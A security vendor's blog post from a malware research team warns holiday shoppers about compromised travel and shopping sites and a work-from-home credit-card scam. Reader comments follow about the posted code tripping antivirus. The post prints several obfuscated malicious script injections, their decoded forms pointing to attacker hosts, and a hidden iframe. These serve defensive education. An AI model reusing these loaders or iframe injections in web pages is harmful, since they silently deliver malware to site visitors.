Fancy a ‘Work-From-Home-Scam’ with that Holiday?

Prepared by Steve Espino – PC Tools Malware Research Team

With the holidays just around the corner, people the world over are looking for the best deals on holiday packages and gifts for their friends and family. What better place to look than on the Internet—in the comfort of one’s own home and on one’s own digital devices? After all, travel sites that help eager holiday-goers find that perfect holiday getaway abound.

Yet while there are a host of legitimate travel and shopping websites, there are also, unfortunately, plenty of fraudulent websites posing as credible ones. And the threats don’t stop there; users also need to be aware that even legit travel and shopping-related websites may be prone to attacks. Although these trustworthy sites may appear ‘normal’ at first glance, there is often malicious code lurking beneath that puts your privacy at risk.

What you see is what you get. Or is it?

These are samples of legitimate sites that have been compromised with malicious invisible iframes or obfuscated scripts.

And below are some examples of these malicious scripts:

Users on the lookout for printable cards for Halloween and Hanukkah may have an embedded obfuscated malicious script to go with the cards:

<script>eval(unescape(‘var%20uhiktcwksaxfs%3D%27ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789%2B%2F%27%3B%20function%20cxifjpvhyfhch%28str%29%20%7B%20str%3Dstr.split%28%27%40%27%29.join%28%27CAg%27%29%3B%20str%3Dstr.split%28%27%21%27%29.join%28%27W5%27%29%3B%20str%3Dstr.split%28%27%2A%27%29.join%28%27CAgI%27%29%3B%20var%20bt%2C%20dt%20%3D%20%27%27%3B%20for%28i%3D0%3B%20i%3Cstr.length%3B%20i%20%2B%3D%204%29%20%7B%20bt%20%3D%20%28uhiktcwksaxfs.indexOf%28str.charAt%28i%29%29%20%26%200xff%29%20%3C%3C18%20%7C%20%28uhiktcwksaxfs.indexOf%28str.charAt%28i%20%2B1%29%29%20%26%200xff%29%20%3C%3C12%20%7C%20%28uhiktcwksaxfs.indexOf%28str.charAt%28i%20%2B2%29%29%20%26%200xff%29%20%3C%3C%206%20%7C%20uhiktcwksaxfs.indexOf%28str.charAt%28i%20%2B3%29%29%20%26%200xff%3B%20dt%20%2B%3D%20String.fromCharCode%28%28bt%20%26%200xff0000%29%20%3E%3E16%2C%20%28bt%20%26%200xff00%29%20%3E%3E8%2C%20bt%20%26%200xff%29%3B%20%7D%20if%28str.charCodeAt%28i%20-2%29%20%3D%3D%2061%29%20%7B%20return%28dt.substring%280%2C%20dt.length%20-2%29%29%3B%20%7D%20else%20if%28str.charCodeAt%28i%20-1%29%20%3D%3D%2061%29%20%7B%20return%28dt.substring%280%2C%20dt.length%20-1%29%29%3B%20%7D%20else%20%7Breturn%28dt%29%7D%3B%20%7D’)); document.write(cxifjpvhyfhch(‘PHNjcmlwdCBsY!ndWFnZT1KYXZhU2NyaXB0IHNyYz0iaHR0cDovL25vLXRvLWJlLmNuL3BkZnMvbWFpbi5waHA/cj0rZXNjYXBlKGRvY3VtZ!0LnJlZmVycmVyKSsmbj14JnM9K2xvY2F0aW9uLmhyZWYrIj48L3NjcmlwdD4=’)); </script>

This translates to an embedded script:

<script language=JavaScript src=”hxxp://no-<blocked>.cn/pdfs/main.php?r=+escape(document.referrer)+&n=x&s=+location.href+”></script>

Here is an embedded obfuscated malicious script found in a website offering Yoga retreats in fantastic locations like Greece and India:

document.write(‘<script src=’+'h@^t@!$t$(p$^:#/)$&/$)n#(e$)w@s!$3$@i@!)n$)s!#i!d$)e##)r!$$-@(#c)(@o^@@))m^$.!)n$e&x)t@!&a&!&g^!@.#!c$@o!!m(!&).!(w)^$)i$@$n($$)d(o^!!w^#s&!l@$i#^v!e)^&-!^^c^!o^m).$c$o(#b#&^(a()$^l)#t$@t@(^r#!@u)&!e)&b(&l$@&!)u$#e(!$.&!(r^#&(!u@(:!&8#(!0!(8&^0#/#b#(&l!o)&g(^(f$!a$.))c$($o(@m$/((#!b)l(o!!#@g@)^f&#a&.)@c^#o!m#!/@)#g$(&o(^o@$)g(l(&e#$$.!@c$o^m$/))!w^^e^a#^@!t&#^@h)$$(e&r$.(@#c!o!m^/^!h(&#s!#b$$c((.)&c!@$o).&##&u(#k&!^#&/$)$^’.replace(/#|)|(|!|@|^|$|&/ig, ”)+’ defer=defer></scr’+'ipt>’);</

Which translates to:

<script src=hxxp://news<blocked>blue.ru:8080/blogf<blocked>.com/google.com/weather.com/hsbc.co.uk/ defer=defer></script>

This one is from a website selling wholesale designer merchandise:


/*@cc_on @*/

/*@if (@_win32)

var source =”=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6/23:/255/33:0tubut0tubut/kt#?=0tdsjqu?”; var result = “”;

for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);


/*@end @*/


The malicious script only executes when Windows users visit the site.

Deobfuscation reveals the following embedded script, which is designed to look like normal website statistics scripts in order to evade detection:

<script type=”text/javascript” src=”http://9<blocked>4.229/stats/stats.js”></script>

PC Tools also came across a travel website with pages that were injected all over with hidden, malicious iframes like this one:

<iframe width=”1″ height=”1″ src=”hxxp://st<blocked>7.info/traff/index2.php” style=”border: 0;”></iframe>

This hidden iframe runs a script from a malicious website, which allows the hackers to deliver any payload they desire–ranging from Fake AVs and password stealers to ransomware and worms that turn computers into ‘zombies’ as part of a large bot network.

In another instance, unsuspecting users are offered the opportunity to start earning money from home immediately. The scam entices users to sign up quickly by falsely claiming that there are very few positions remaining.

When users try to leave the page, the site offers them a chat with an “Agent” to “secure your position.” Users may be tricked into thinking that the agent is authentic when, in fact, it is often an automated bot.

Using names of big media networks

Same propaganda hosted on different sites

(un) Lucky you!

Hand over the money, voluntarily

Chat with an "Agent"

When users sign up, they are asked for their credit card details. This could result in massive fraudulent charges and even identity theft. For more information on identity theft, please visit the PC Tools Blog entry on the subject by clicking here.

PC Tools advises against entering credit card information on any suspicious forms or sites. Victims of these attacks are strongly advised to contact their credit card companies immediately to dispute any anomalous transactions and to ensure that there will be no future unauthorized charges.

We wish everyone a virus-free and scam-free Holiday Season!

This entry was posted in Online Fraud and tagged , , , . Bookmark the permalink.

3 Responses to Fancy a ‘Work-From-Home-Scam’ with that Holiday?

  1. spg SCOTT says:


    This blog post is useful in explaining something elsewhere and I would like to use it, however there is an issue with the script you have posted.
    As it is posted in text form, it causes my antivirus to alert. Would it be possible to repost the code in an image, to prevent this from happening?

    I will post what I posted on the forum that it was reported:

    Because the code is posted directly (and by the looks of it in full) it also exists in the source code. This means that when the AV will scan the page, it will see that code and generate an alert.

    This is exactly the reason that I (and others here) recommend the posting of malicious code as images, as this problem will not arise.



  2. PC Tools says:

    Thanks for the heads up Scott!

    Which AV package are you using, out of curiosity?

  3. spg SCOTT says:


    My antivirus is avast!

    From looking at the code, it seems as though it is alerting on the code that contains “cc_o”.
    While this is technically a false positive on the page, the detection is inherantly correct, the code is malicious.
    It looks like you have commented out the characters, apparenty this is not enough, as the code still exists in the page.

    Please can it be replaced with images?

    If you would like to continue this discussion by email, that is possible, as I think that it can be resolved quicker.

    The annoying thing is that the redirection, and the scam is useful to me to explain what happens with another code I have seen.
    (in that case the code loads an iframe to another site, which in turn causes a popup of the “news11″ page you have shown.)



Leave a Reply

Your email address will not be published. Required fields are marked *


You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>